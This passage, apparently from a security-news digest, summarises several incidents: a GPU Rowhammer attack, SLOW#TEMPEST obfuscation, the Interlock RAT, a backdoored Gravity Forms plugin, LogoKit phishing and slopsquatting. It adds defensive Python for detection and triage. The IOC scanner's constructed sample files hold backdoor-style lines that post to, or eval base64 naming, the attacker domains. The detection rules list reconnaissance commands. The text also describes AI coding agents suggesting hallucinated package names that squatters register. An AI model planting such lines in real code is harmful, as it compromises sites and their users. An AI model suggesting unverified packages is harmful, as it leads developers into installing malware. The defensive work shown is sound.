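    """One linear neuron with a step activation: 1 if w.x + b > 0 else 0."""
    score = sum(w * x for w, x in zip(weights, features)) + bias
    return 1 if score > 0 else 0


def accuracy(weights, bias, dataset) -> float:
    hits = sum(predict(weights, bias, x) == label for x, label in dataset)
    return hits / len(dataset)


def make_dataset():
    """Constructed 5x5 grid of points in [0, 2]^2, labelled 1 when x0 + x1 > 1 (no real data)."""
    grid = [i * 0.5 for i in range(5)]
    return [((a, b), 1 if a + b > 1.0 else 0) for a in grid for b in grid]


def hammer(weights, index, bit):
    """Simulate a single Rowhammer bit flip landing in weight number `index`."""
    corrupted = list(weights)
    corrupted[index] = flip_bit(corrupted[index], bit)
    return corrupted


def demo(bit: int = 29):
    """Accuracy before and after flipping one bit of the first weight.
    The clean model (w = [1, 1], b = -1) reproduces the labelling rule exactly.
    Bit 29 is the second-highest exponent bit: 1.0 becomes 2**-64, i.e. the weight vanishes."""
    weights, bias = [1.0, 1.0], -1.0
    data = make_dataset()
    return accuracy(weights, bias, data), accuracy(hammer(weights, 0, bit), bias, data)


if __name__ == "__main__":
    for bit in (0, 23, 29, 31):
        before, after = demo(bit)
        print(f"bit {bit:2d}: weight 1.0 -> {flip_bit(1.0, bit)!r:>12}  accuracy {before:.2f} -> {after:.2f}")
```

The mantissa bits (0..22) barely move the decision boundary; the damage comes from exponent and sign bits, which is why a single well-placed flip, rather than many random ones, is enough to reproduce the kind of collapse the researchers reported. ECC catches exactly this single-bit case.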

Recommended read:
References :
  • cyberpress.org: GPUHammer: First Rowhammer Exploit Aimed at NVIDIA GPUs
  • The Hacker News: GPUHammer: New RowHammer Attack Variant Degrades AI Models on NVIDIA GPUs
  • Talkback Resources: NVIDIA shares guidance to defend GDDR6 GPUs against Rowhammer attacks
  • BleepingComputer: NVIDIA shares guidance to defend GDDR6 GPUs against Rowhammer attacks
  • Cyber Security News: The hardware security landscape has taken a dramatic turn as researchers have, for the first time, demonstrated a successful Rowhammer attack targeting NVIDIA A6000 GPUs utilizing GDDR6 memory.
  • gbhackers.com: Researchers from the University of Toronto have unveiled the first successful Rowhammer attack on an NVIDIA GPU, specifically targeting the A6000 model equipped with GDDR6 memory.
  • gpuhammer.com: GPUHammer: Rowhammer bit flips on GPU memories, specifically on a GDDR6 memory in an NVIDIA A6000 GPU. Our attacks induce bit flips across all tested DRAM banks, despite in-DRAM defenses like TRR, using user-level CUDA code.
  • www.bleepingcomputer.com: NVIDIA shares guidance to defend GDDR6 GPUs against Rowhammer attacks

@gbhackers.com //
Cybersecurity experts have identified a significant evolution in the tactics employed by the SLOW#TEMPEST malware group, which is now utilizing advanced obfuscation techniques to bypass detection systems. This latest variant is distributed as an ISO file containing both malicious and seemingly benign files, a common strategy to evade initial scanning. The malware employs DLL sideloading, a technique where a legitimate, signed executable like DingTalk.exe is tricked into loading a malicious DLL, zlibwapi.dll. This loader DLL then decrypts and executes a payload appended to another DLL, ipc_core.dll, creating a multi-stage attack that complicates analysis and detection.

At the core of SLOW#TEMPEST's enhanced evasion are obfuscation methods designed to thwart both static and dynamic analysis. The malware applies control flow graph (CFG) obfuscation through dynamic jumps: the destination of an instruction such as JMP RAX is computed at runtime from system state and CPU flags, so a static disassembler sees only an indirect jump with no resolvable target and cannot reconstruct the control flow. Function calls are obfuscated the same way, with addresses resolved dynamically at runtime, which hides which Windows APIs the sample actually reaches. Researchers countered these tactics with the Unicorn CPU emulation framework, isolating and executing each dispatcher routine under the possible register and flag states to reveal the dynamic jump destinations and restore a readable program flow.

Palo Alto Networks researchers have delved into these advanced obfuscation techniques, highlighting methods and code that can be used to detect and defeat them. Their analysis reveals that the malware authors are actively manipulating execution paths and obscuring function calls to make their malicious code as difficult to analyze as possible. The campaign's use of dynamic jumps and obfuscated function calls forces security practitioners to adopt advanced emulation and scripting to dissect the malware's operations effectively. Understanding and counteracting these evolving tactics is crucial for developing robust detection rules and strengthening defenses against increasingly sophisticated cyber threats. Palo Alto Networks customers are reportedly better protected against these threats through products like Advanced WildFire, Cortex XDR, and XSIAM.
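
The recovery technique is easier to see on a toy than on a real binary. The block below is an added example written for this page, not code from Unit 42 or from the malware: the dispatcher is a constructed sequence in a tiny register machine (only mov, add, cmovz, cmovc and jmp are modelled), and the point is the loop in `resolve_dispatcher`, which executes the dispatcher once per flag state and records where the indirect jump lands. With a real sample you would hand Unicorn the dispatcher's bytes and vary the flags register between runs in the same way; the toy machine stands in so the block runs without an emulator installed.

```python
from itertools import product

MASK64 = (1 << 64) - 1

# Constructed dispatcher in the style described above; NOT SLOW#TEMPEST code.
# Each tuple is (mnemonic, destination register, source), source being an immediate or a register.
DISPATCHER = [
    ("mov",   "rax", 0x140001000),  # base address of the handler region (made-up value)
    ("mov",   "rcx", 0),
    ("mov",   "rdx", 0x120),
    ("cmovz", "rcx", "rdx"),        # rcx = ZF ? 0x120 : 0
    ("add",   "rax", "rcx"),
    ("mov",   "rcx", 0),
    ("mov",   "rdx", 0x3A0),
    ("cmovc", "rcx", "rdx"),        # rcx = CF ? 0x3A0 : 0
    ("add",   "rax", "rcx"),
    ("jmp",   "rax", None),         # the opaque JMP RAX a disassembler cannot resolve
]


def emulate(program, zf: int, cf: int) -> int:
    """Run the dispatcher under one (ZF, CF) state and return the address it jumps to."""
    regs = {"rax": 0, "rcx": 0, "rdx": 0}

    def value(src):
        return regs[src] if isinstance(src, str) else src

    for op, dst, src in program:
        if op == "mov":
            regs[dst] = value(src) & MASK64
        elif op == "add":
            regs[dst] = (regs[dst] + value(src)) & MASK64
        elif op == "cmovz":
            if zf:
                regs[dst] = value(src)
        elif op == "cmovc":
            if cf:
                regs[dst] = value(src)
        elif op == "jmp":
            return value(dst)
        else:
            raise ValueError(f"unsupported op {op}")
    raise RuntimeError("dispatcher fell through without jumping")


def resolve_dispatcher(program) -> dict:
    """Brute-force every flag state the dispatcher reads; the result is the set of CFG edges
    that static analysis lost: {(ZF, CF): target}."""
    return {(zf, cf): emulate(program, zf, cf) for zf, cf in product((0, 1), repeat=2)}


def recovered_targets(program) -> list:
    return sorted(set(resolve_dispatcher(program).values()))


if __name__ == "__main__":
    for flags, target in resolve_dispatcher(DISPATCHER).items():
        print(f"ZF={flags[0]} CF={flags[1]} -> {target:#x}")
```

Two flags give at most four destinations, so enumeration is cheap; when a dispatcher also mixes in a runtime value such as a handle or a timestamp, the same loop is driven over the small range of values that matter, or the value is fixed to what the emulator observed at the call site.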

Recommended read:
References :
  • unit42.paloaltonetworks.com: Evolving Tactics of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques
  • Cyber Security News: SLOW#TEMPEST Employs Advanced Evasion Techniques to Evade Detection
  • gbhackers.com: SLOW#TEMPEST Hackers Adopt New Evasion Tactics to Bypass Detection Systems
  • cyberpress.org: SLOW#TEMPEST Employs Advanced Evasion Techniques to Evade Detection
  • gbhackers.com: SLOW#TEMPEST Hackers Adopt New Evasion Tactics to Bypass Detection Systems
  • malware.news: Malware News: SLOW#TEMPEST Hackers Adopt New Evasion Tactics to Bypass Detection Systems
  • Virus Bulletin: Palo Alto Networks researchers explore the obfuscation techniques employed by the malware authors in the SLOW#TEMPEST campaign and highlight methods and code that can be used to detect and defeat these techniques.

@cyberalerts.io //
Cybersecurity researchers have uncovered critical vulnerabilities in Kigen's eSIM technology, potentially impacting billions of Internet of Things (IoT) devices and mobile networks worldwide. Security Explorations, a research lab, demonstrated that they could compromise Kigen's eUICC cards, a component essential for eSIM functionality. The attack allowed researchers to extract private encryption keys and download arbitrary eSIM profiles from major mobile network operators. This breach raises significant concerns about identity theft and the potential interception of communications for a vast number of connected devices.

The exploitation of these flaws builds upon prior Java Card research from 2019, which highlighted fundamental weaknesses in virtual machine implementations. Researchers were able to bypass security measures on the eUICC chip, which is designed to securely store and manage mobile carrier profiles. By exploiting type confusion vulnerabilities, they gained unauthorized access to the chip's memory, enabling the extraction of critical cryptographic keys like the private ECC key for GSMA certificates. This effectively undermined the trust model that underpins the entire eSIM ecosystem, as the eSIM profiles themselves and the Java applications stored on the chip were found to lack proper isolation or protection.

While Kigen has acknowledged the issue and deployed mitigations, including hardening bytecodes and tightening test profile rules, concerns remain regarding the root cause of the vulnerability. The GSMA TS.48 Generic Test Profile, versions 6.0 and earlier, has been identified as a contributing factor, allowing for the installation of unverified or malicious applets. Although the latest version of the GSMA standard addresses this, the existence of these fundamental flaws in widely deployed eSIM technology highlights the ongoing challenges in securing the rapidly expanding IoT landscape and the potential for widespread compromise if not adequately addressed.

Recommended read:
References :
  • Cyber Security News: New eSIM Hack Let Attackers Clone Your eSIM Profile
  • securityaffairs.com: Experts uncover critical flaws in Kigen eSIM technology affecting billions
  • thehackernews.com: eSIM Vulnerability in Kigen's eUICC Cards Exposes Billions of IoT Devices to Malicious Attacks

@training.invokere.com //
Researchers have uncovered a new and sophisticated variant of the Interlock RAT, a remote access trojan associated with the Interlock ransomware group. This latest iteration is written in PHP, marking a departure from previously observed JavaScript-based versions. The malware is being distributed through a widespread campaign that leverages compromised websites and Cloudflare tunnels. The attack chain begins with a single-line script injected into website HTML, often unbeknownst to the website owners. This script employs IP filtering to serve the payload, which then manipulates the user into clicking a captcha for "verification," ultimately leading to the execution of a PowerShell script that deploys the Interlock RAT.

The delivery mechanism for this new PHP variant utilizes the KongTuke FileFix technique. Researchers have noted that this updated method has been observed deploying the PHP version of the Interlock RAT, and in some instances, this has subsequently led to the deployment of the Node.js variant of the same RAT. The capabilities of this Interlock RAT variant include remote control of compromised systems, thorough system reconnaissance, and the ability to perform lateral movement within a network. This demonstrates an evolving level of sophistication in the threat actor's tactics.

The DFIR Report, in collaboration with Proofpoint, identified the malware and its distribution methods. The observed execution involves a PowerShell command that deletes a scheduled task named "Updater" before downloading and executing a script from a specific URL. This script, in turn, abuses the `php.exe` executable from an uncommon location to further download and execute the RAT. Security professionals are advised to be aware of PowerShell spawning `php.exe` from unusual directories as a potential indicator of compromise. Additionally, the RAT's reconnaissance activities, such as running `systeminfo`, `tasklist`, `whoami`, or `nltest`, provide further opportunities for detection.
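
The two indicators above translate directly into detection logic. The block below is an added example written for this page, not code from The DFIR Report or Proofpoint: the process-creation events are constructed (Sysmon Event ID 1 boiled down to pipe-delimited fields), the list of directories where php.exe is expected to live is an assumption to tune per estate, and the two rules are the ones the paragraph describes: php.exe spawned by PowerShell from an unusual path, and a burst of reconnaissance commands from one parent process.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RECON_TOOLS = {"systeminfo", "tasklist", "whoami", "nltest"}
# Assumed legitimate php.exe locations on the hosts you manage; adjust to your estate.
EXPECTED_PHP_DIRS = ("c:\\program files\\php\\", "c:\\php\\", "c:\\xampp\\php\\")
BURST_WINDOW = timedelta(minutes=5)
BURST_MIN_TOOLS = 3

# Constructed sample events; not captured telemetry.
SAMPLE_EVENTS = r"""
2025-07-14T10:00:00Z|pid=4000|ppid=1200|parent=C:\Windows\explorer.exe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2025-07-14T10:00:05Z|pid=4100|ppid=4000|parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|image=C:\Users\bob\AppData\Roaming\php\php.exe
2025-07-14T10:00:10Z|pid=4110|ppid=4100|parent=C:\Users\bob\AppData\Roaming\php\php.exe|image=C:\Windows\System32\systeminfo.exe
2025-07-14T10:00:12Z|pid=4111|ppid=4100|parent=C:\Users\bob\AppData\Roaming\php\php.exe|image=C:\Windows\System32\tasklist.exe
2025-07-14T10:00:15Z|pid=4112|ppid=4100|parent=C:\Users\bob\AppData\Roaming\php\php.exe|image=C:\Windows\System32\whoami.exe
2025-07-14T10:00:20Z|pid=4113|ppid=4100|parent=C:\Users\bob\AppData\Roaming\php\php.exe|image=C:\Windows\System32\nltest.exe
2025-07-14T10:30:00Z|pid=5200|ppid=5100|parent=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|image=C:\Program Files\PHP\php.exe
2025-07-14T11:00:00Z|pid=6300|ppid=6200|parent=C:\Windows\System32\cmd.exe|image=C:\Windows\System32\whoami.exe
"""


def parse_event(line: str) -> dict:
    ts, *fields = line.split("|")
    event = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def php_from_powershell(event: dict) -> bool:
    """Rule 1: php.exe launched by PowerShell from somewhere PHP is not normally installed."""
    return (basename(event["image"]) == "php.exe"
            and basename(event["parent"]) == "powershell.exe"
            and not event["image"].lower().startswith(EXPECTED_PHP_DIRS))


def recon_bursts(events: list) -> list:
    """Rule 2: at least BURST_MIN_TOOLS distinct recon tools spawned by one parent inside BURST_WINDOW."""
    by_parent = defaultdict(list)
    for event in events:
        tool = basename(event["image"]).removesuffix(".exe")
        if tool in RECON_TOOLS:
            by_parent[event["ppid"]].append((event["ts"], tool))
    alerts = []
    for ppid, runs in by_parent.items():
        runs.sort()
        for i, (start, _) in enumerate(runs):
            tools = {tool for ts, tool in runs[i:] if ts - start <= BURST_WINDOW}
            if len(tools) >= BURST_MIN_TOOLS:
                alerts.append(("recon_burst", ppid, sorted(tools)))
                break
    return alerts


def detect(log_text: str) -> list:
    events = [parse_event(line) for line in log_text.strip().splitlines()]
    alerts = [("php_from_powershell", e["pid"], e["image"]) for e in events if php_from_powershell(e)]
    alerts.extend(recon_bursts(events))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The legitimate-looking php.exe under Program Files and the lone whoami from cmd.exe produce nothing; the sideloaded copy under AppData and the four-command burst from it each raise one alert, and the shared pid 4100 ties the two together.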

Recommended read:
References :

Aman Mishra@gbhackers.com //
Hackers have compromised the popular WordPress plugin Gravity Forms, embedding malicious code into versions downloaded directly from the official gravityforms.com website. This is a supply chain attack rather than an exploited bug in the plugin: a site that installed a tampered download was backdoored from the moment the files landed, whatever its configuration, and the attack targets the large share of WordPress sites that rely on Gravity Forms for form creation and data collection. Reports tie the injected code to a gf_api_token request parameter. The malicious PHP was planted in core plugin files such as gravityforms/common.php and includes/settings/class-settings.php, creating backdoors that can lead to remote code execution and unauthorized access.

The malicious campaign was first detected when security researchers observed suspicious HTTP POST requests to a newly registered domain, gravityapi.org, which served as a command-and-control server. The injected malware is capable of exfiltrating sensitive WordPress site data, including URLs, plugin lists, user counts, and environment details, transmitting this information to the attacker-controlled domain. Upon receiving a response, the malware can deploy further payloads, such as writing a backdoored PHP file to the server that masquerades as legitimate content management tools. This backdoor enables attackers to execute arbitrary code, create new administrator accounts, upload files, and manipulate site content with devastating effects.

In response, Gravity Forms has released version 2.9.13 of the plugin, which is confirmed to be free of the backdoor, and the registrar Namecheap has suspended the malicious gravityapi.org domain to disrupt ongoing exploitation. Website administrators are strongly advised to update Gravity Forms to the latest version immediately. Updating replaces the tampered plugin files, but it does not remove a backdoor file the malware may already have written elsewhere in the installation, so any site that ran a tampered copy should also be searched for unexpected PHP files, unknown administrator accounts, and references to the attacker's domain. Monitoring network traffic for POST requests to gravityapi.org remains a useful detection, with the caveat that a suspended domain simply stops resolving, so the absence of such traffic does not prove a site is clean.
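
A file-level sweep for the attacker's domain is the quickest triage step, and it should not be defeated by the string being base64-encoded inside an eval'd blob. The block below is an added example written for this page, not Gravity Forms or Patchstack code: the sample "plugin files" are constructed stand-ins, the only indicators it knows are the two domains named in the reports above, and `base64_variants` precomputes the three base64 substrings that appear whenever the domain is encoded at any byte alignment (the same trick YARA's base64 string modifier uses), so no decoding of candidate blobs is needed.

```python
import base64
from pathlib import Path

# Indicators named in the reports cited on this page.
IOC_DOMAINS = ("gravityapi.org", "gravityapi.io")


def base64_variants(needle: bytes) -> list:
    """Three base64 substrings, one per alignment (0, 1 or 2 unknown bytes before `needle`).
    Characters whose value depends on unknown neighbouring bytes are trimmed from both ends."""
    variants = []
    for lead in range(3):
        enc = base64.b64encode(b"\x00" * lead + needle).decode("ascii")
        total = lead + len(needle)
        stable_end = 4 * (total // 3) + (total % 3)  # chars fully determined by known bytes
        skip = (0, 2, 3)[lead]                        # chars tainted by the unknown lead bytes
        variants.append(enc[skip:stable_end].encode("ascii"))
    return variants


def build_patterns(domains=IOC_DOMAINS) -> dict:
    patterns = {}
    for domain in domains:
        raw = domain.encode("ascii")
        patterns[domain] = [("plain", raw)] + [("base64", v) for v in base64_variants(raw)]
    return patterns


def scan_bytes(data: bytes, patterns=None) -> list:
    """Return [(domain, how it was found)] for every indicator present in `data`."""
    patterns = patterns or build_patterns()
    hits = []
    for domain, needles in patterns.items():
        for kind, needle in needles:
            if needle in data:
                hits.append((domain, kind))
                break
    return hits


def scan_files(files: dict, patterns=None) -> dict:
    """files: {name: bytes}. Returns only the entries with hits."""
    patterns = patterns or build_patterns()
    return {name: hits for name, data in files.items() if (hits := scan_bytes(data, patterns))}


def scan_tree(root, suffixes=(".php", ".js", ".html", ".txt")) -> dict:
    """Sweep a WordPress install on disk, e.g. scan_tree('/var/www/html/wp-content')."""
    root = Path(root)
    return scan_files({str(p): p.read_bytes()
                       for p in root.rglob("*") if p.is_file() and p.suffix.lower() in suffixes})


# Constructed stand-ins for plugin files; not real Gravity Forms code.
SAMPLE_FILES = {
    "gravityforms/common.php":
        b"<?php /* ... */ $r = wp_remote_post('https://gravityapi.org/sites', $args);",
    "gravityforms/includes/settings/class-settings.php":
        b"<?php eval(base64_decode('" + base64.b64encode(b"$u='https://gravityapi.io/';") + b"'));",
    "gravityforms/gravityforms.php":
        b"<?php // clean plugin bootstrap",
}

# The same URL encoded at each of the three alignments; all must be caught.
ALIGNMENT_PROBES = [base64.b64encode(lead + b"https://gravityapi.org/x") for lead in (b"", b"a", b"ab")]

if __name__ == "__main__":
    for name, hits in scan_files(SAMPLE_FILES).items():
        print(name, hits)
```

A hit is a reason to pull the site offline and rebuild the plugin from a clean copy, not merely to delete the matching line; a clean sweep says nothing about backdoors that do not reference the domain, which is why the account and file audit above still matters.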

Recommended read:
References :
  • cyberpress.org: WordPress GravityForms Plugin Targeted in Malicious Code Injection Attack
  • Ian Campbell: Just a heads-up on this supply chain attack on the Gravity Forms wordpress plugin, one IOC is POST requests to gravityapi[.]org - a 3 day old domain. That domain shares an IP with gravityapi[.]io. cc
  • Talkback Resources: WordPress Gravity Forms developer hacked to push backdoored plugins
  • gbhackers.com: Hackers Compromise WordPress GravityForms Plugin with Malicious Code Injection
  • Cyber Security News: WordPress GravityForms Plugin Targeted in Malicious Code Injection Attack
  • securityonline.info: WordPress Supply Chain Attack: Gravity Forms Plugin Backdoored Through Official Downloads
  • gbhackers.com: Hackers have targeted the popular WordPress plugin Gravity Forms, injecting malicious code into versions downloaded from the official gravityforms.com domain.

@www.helpnetsecurity.com //
Bitwarden Unveils Model Context Protocol Server for Secure AI Agent Integration

Bitwarden has launched its Model Context Protocol (MCP) server, a new tool designed to facilitate secure integration between AI agents and credential management workflows. The MCP server is built with a local-first architecture, ensuring that all interactions between client AI agents and the server remain within the user's local environment. This approach significantly minimizes the exposure of sensitive data to external threats. The new server empowers AI assistants by enabling them to access, generate, retrieve, and manage credentials while rigorously preserving zero-knowledge, end-to-end encryption. This innovation aims to allow AI agents to handle credential management securely without the need for direct human intervention, thereby streamlining operations and enhancing security protocols in the rapidly evolving landscape of artificial intelligence.

The Bitwarden MCP server establishes a foundational infrastructure for secure AI authentication, equipping AI systems with precisely controlled access to credential workflows. This means that AI assistants can now interact with sensitive information like passwords and other credentials in a managed and protected manner. The MCP server standardizes how applications connect to and provide context to large language models (LLMs), offering a unified interface for AI systems to interact with frequently used applications and data sources. This interoperability is crucial for streamlining agentic workflows and reducing the complexity of custom integrations. As AI agents become increasingly autonomous, the need for secure and policy-governed authentication is paramount, a challenge that the Bitwarden MCP server directly addresses by ensuring that credential generation and retrieval occur without compromising encryption or exposing confidential information.

This release positions Bitwarden among the first password managers to offer a supported path for integrating AI assistants into credential workflows. The local-first architecture is a key feature, ensuring that credentials remain on the user's machine and are subject to zero-knowledge encryption throughout the process. The MCP server also integrates with the Bitwarden Command Line Interface (CLI) for secure vault operations and offers the option for self-hosted deployments, granting users greater control over system configurations and data residency. The Model Context Protocol itself is an open standard, fostering broader interoperability and allowing AI systems to interact with various applications through a consistent interface. The Bitwarden MCP server is now available through the Bitwarden GitHub repository, with plans for expanded distribution and documentation in the near future. One caveat for anyone deploying it: local-first limits exposure of the vault, not of the secrets an agent retrieves. A credential handed to an agent enters the model's context and travels wherever that context goes, including to a hosted LLM if the agent uses one, so vault access granted to an agent should be scoped to the few items it actually needs.

Recommended read:
References :
  • cloudnativenow.com: Docker. Inc. today extended its Docker Compose tool for creating container applications to include an ability to now also define architectures for artificial intelligence (AI) agents using YAML files.
  • DEVCLASS: Docker has added AI agent support to its Compose command, plus a new GPU-enabled Offload service which enables […]
  • Docker: Agents are the future, and if you haven’t already started building agents, you probably will soon.
  • Docker: Blog post on Docker MCP Gateway: Open Source, Secure Infrastructure for Agentic AI
  • CyberInsider: Bitwarden Launches MCP Server to Enable Secure AI Credential Management
  • discuss.privacyguides.net: Bitwarden sets foundation for secure AI authentication with MCP server
  • Help Net Security: Bitwarden MCP server equips AI systems with controlled access to credential workflows

@cyble.com //
Cyble threat intelligence researchers have uncovered a global phishing campaign leveraging the LogoKit phishing kit. This sophisticated kit is being used to target government, banking, and logistics sectors. The initial discovery stemmed from a phishing link mimicking the Hungary CERT login page, highlighting the campaign's ability to impersonate legitimate websites to steal credentials.

LogoKit is designed to make a spoofed login page look credible and so raise the odds of a successful credential theft. The phishing URLs often carry the victim's email address, which the kit uses to pre-fill the username field on the spoofed login page; the domain part of that address also tells the kit which brand to impersonate. This personalised approach, combined with the kit's ability to generate convincing phishing pages on the fly, makes it a potent threat. Analysis by Cyble Research and Intelligence Labs (CRIL) shows that the kit pulls brand assets from Clearbit's logo API and Google's favicon service to build realistic-looking login pages.
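
Because the kit needs the victim's address in the URL, the URL itself is a triage artifact: it tells you who was targeted and which brand the page will imitate. The block below is an added example written for this page, not Cyble's tooling: it pulls an email address out of a URL's fragment, path or query string, also trying a base64-decoded form of each piece (an assumption about kit variants, since not every campaign encodes the address), and reports the targeted user and organisation domain. The sample URLs are constructed on example-style hosts, not real campaign infrastructure.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def _maybe_base64(text: str):
    """Decode `text` as base64 when it is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
        decoded = raw.decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if decoded.isprintable() else None


def embedded_email(url: str):
    """Return the email address a phishing URL carries in its fragment, path or query, or None."""
    parts = urlsplit(url)
    candidates = [unquote(parts.fragment), unquote(parts.path)]
    for values in parse_qs(parts.query).values():
        candidates.extend(values)
    for text in list(candidates):          # also consider a base64-decoded form of each piece
        decoded = _maybe_base64(text)
        if decoded:
            candidates.append(decoded)
    for text in candidates:
        match = EMAIL_RE.search(text)
        if match:
            return match.group(0)
    return None


def triage(urls):
    """(url, targeted address, targeted organisation's domain) for each URL that embeds an address.
    The domain is what a kit like LogoKit feeds to a logo API to pick the brand to imitate."""
    return [(u, e, e.rsplit("@", 1)[1].lower()) for u in urls if (e := embedded_email(u))]


# Constructed URLs for the example; not real campaign infrastructure.
SAMPLE_URLS = [
    "https://cdn.example-host.net/login/index.html#victim@agency.example.hu",
    "https://files.example-storage.com/auth/?email=cfo%40bank.example.com",
    "https://static.example.org/verify.html#" + base64.b64encode(b"ops@logistics.example.com").decode(),
    "https://www.example.com/docs/page",
    "https://mail.example.com/owa/#inbox",
]

if __name__ == "__main__":
    for url, email, org in triage(SAMPLE_URLS):
        print(f"{org:28} {email:32} {url}")
```

Run over URLs from a proxy or mail gateway log, the output is a list of users to contact and reset, and the domains give an immediate picture of which organisations the campaign is aimed at; the two benign URLs produce nothing.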

These phishing campaigns are part of a larger trend of surging identity attacks. Reports indicate a significant increase in cyberattacks targeting user logins, with criminals increasingly turning to phishing-as-a-service platforms and infostealers to feed BEC schemes and ransomware intrusions. DNS-layer controls such as blocking newly registered and lookalike domains cut off much of this infrastructure before a page loads; beyond that, phishing-resistant MFA (FIDO2 or passkeys) is the control that makes a harvested password useless on its own.

Recommended read:
References :
  • thecyberexpress.com: Cyble threat intelligence researchers identified a phishing campaign aimed at Hungarian government targets that further investigation revealed was connected to wider global attack campaigns targeting the banking and logistics sectors.
  • cyble.com: The initial phishing link we identified mimicked the Hungary CERT login page, with the victim's email address prefilled in the username field to enhance credibility and increase the likelihood of credential submission.
  • The Register - Security: Phishing platforms, infostealers blamed as identity attacks soar
  • cyble.com: Cyble's blog post on the LogoKit phishing campaign being leveraged for credential theft.
  • Security Risk Advisors: 🚩 Active LogoKit Phishing Campaign Harvests Credentials Through Automated Brand Impersonation on Cloud Infrastructure

@gbhackers.com //
The rise of AI-assisted coding is introducing new security challenges, according to recent reports. Researchers are warning that the speed at which AI pulls in dependencies can lead to developers using software stacks they don't fully understand, thus expanding the cyber attack surface. John Morello, CTO at Minimus, notes that while AI isn't inherently good or bad, it magnifies both positive and negative behaviors, making it crucial for developers to maintain oversight and ensure the security of AI-generated code. This includes addressing vulnerabilities and prioritizing security in open source projects.

Kernel-level attacks on Windows systems are escalating through the exploitation of signed drivers. Cybercriminals are increasingly using code-signing certificates, often fraudulently obtained, to masquerade malicious drivers as legitimate software. Group-IB research reveals that over 620 malicious kernel-mode drivers and 80-plus code-signing certificates have been implicated in campaigns since 2020. A particularly concerning trend is the use of kernel loaders, which are designed to load second-stage components, giving attackers the ability to update their toolsets without detection.

A new supply-chain attack, dubbed "slopsquatting," is exploiting coding agent workflows to deliver malware. Unlike typosquatting, which relies on a human mistyping a name, slopsquatting targets AI-powered coding assistants such as Claude Code CLI and OpenAI Codex CLI. These agents can confidently suggest package names that do not exist, and because models tend to hallucinate the same names repeatedly, malicious actors can pre-register those names on public registries like PyPI and wait. When developers run the AI-suggested installation commands, they install the squatter's package instead. The practical defenses are layered: pin dependencies in a lockfile, verify that a suggested package exists and has a publishing history before installing it, and treat any install command an agent proposes as something to review rather than paste.
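
The review step can be automated as a gate between the agent's output and the shell. The block below is an added example written for this page, not part of any agent or registry: it pulls package names out of install commands in agent output, then sorts each into "ok" (already in the project's lockfile), "block" (no such package on the registry, which is exactly the name a squatter would register next) or "review" (real, but either new to the project or first published only days ago). The registry lookup is a constructed dictionary with made-up dates standing in for a PyPI JSON or npm registry query, and the package names in the sample are invented.

```python
import re
from datetime import datetime, timedelta, timezone

INSTALL_RE = re.compile(r"\b(?:pip3?|npm|yarn|pnpm)\s+(?:install|add|i)\s+([^\n|&;]+)")


def normalize(token: str) -> str:
    """Strip version specifiers and extras; keep npm scopes such as @types/node."""
    scoped = token.startswith("@")
    body = token[1:] if scoped else token
    body = re.split(r"[=<>!~@\[]", body, maxsplit=1)[0]
    return ("@" + body if scoped else body).lower()


def extract_packages(agent_output: str) -> list:
    """Package names from every pip/npm/yarn/pnpm install line in the agent's reply, in order."""
    names = []
    for match in INSTALL_RE.finditer(agent_output):
        for token in match.group(1).split():
            if token.startswith("-"):       # flags such as -U or --save-dev
                continue
            names.append(normalize(token))
    return list(dict.fromkeys(names))        # de-duplicate, keep order


NOW = datetime(2025, 7, 14, tzinfo=timezone.utc)   # pinned so the example is deterministic

# Constructed stand-in for a registry lookup (name -> first publish date); dates are made up.
FAKE_REGISTRY = {
    "requests": datetime(2011, 2, 14, tzinfo=timezone.utc),
    "axios": datetime(2014, 8, 29, tzinfo=timezone.utc),
    "@types/node": datetime(2016, 5, 1, tzinfo=timezone.utc),
    "fastapi-jwt-helperz": datetime(2025, 7, 11, tzinfo=timezone.utc),   # registered 3 days ago
}
KNOWN_DEPS = {"requests", "axios"}   # what the project's lockfile already declares


def assess(packages, known_deps=KNOWN_DEPS, registry=FAKE_REGISTRY, now=NOW,
           min_age=timedelta(days=30)) -> list:
    """Return (package, verdict, reason) for each name; only 'ok' should install unattended."""
    verdicts = []
    for pkg in packages:
        if pkg in known_deps:
            verdicts.append((pkg, "ok", "already declared in the lockfile"))
        elif pkg not in registry:
            verdicts.append((pkg, "block", "no such package: hallucinated name, the one a squatter registers next"))
        elif now - registry[pkg] < min_age:
            verdicts.append((pkg, "review", f"first published {(now - registry[pkg]).days} days ago"))
        else:
            verdicts.append((pkg, "review", "established package, but new to this project"))
    return verdicts


# Constructed agent reply; the helper packages it names are invented.
AGENT_OUTPUT = """\
Add the dependencies and run the service:

    pip install requests fastapi-jwt-helperz==0.1.0 pydantic-schema-magic
    npm install --save-dev @types/node axios
"""

if __name__ == "__main__":
    for pkg, verdict, reason in assess(extract_packages(AGENT_OUTPUT)):
        print(f"{verdict:6} {pkg:24} {reason}")
```

In a real gate the registry dictionary becomes an HTTP lookup against the registry's metadata API, and the "review" bucket is where a human confirms the package is the one they meant; the "block" bucket is the slopsquatting signal, because a name that resolves to nothing today is precisely the name to expect on the registry tomorrow.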

Recommended read:
References :
  • Cyber Security News: Signed Drivers, Silent Threats: Kernel-Level Attacks on Windows Escalate via Trusted Tools
  • gbhackers.com: New Slopsquatting Attack Exploits Coding Agent Workflows to Deliver Malware

Lawrence Abrams@BleepingComputer //
References: bsky.app , Talkback Resources , nerds.xyz ...
Ingram Micro, a global IT distributor, has confirmed it was hit by a SafePay ransomware attack, causing a significant outage affecting its websites and internal systems. The attack, which began on July 3, 2025, has disrupted order processing and shipments, impacting customers, vendor partners, and others who rely on the company's services. Ingram Micro, one of the world's largest technology distributors with approximately 24,000 employees and $48 billion in revenue in 2024, is working diligently to restore affected systems.

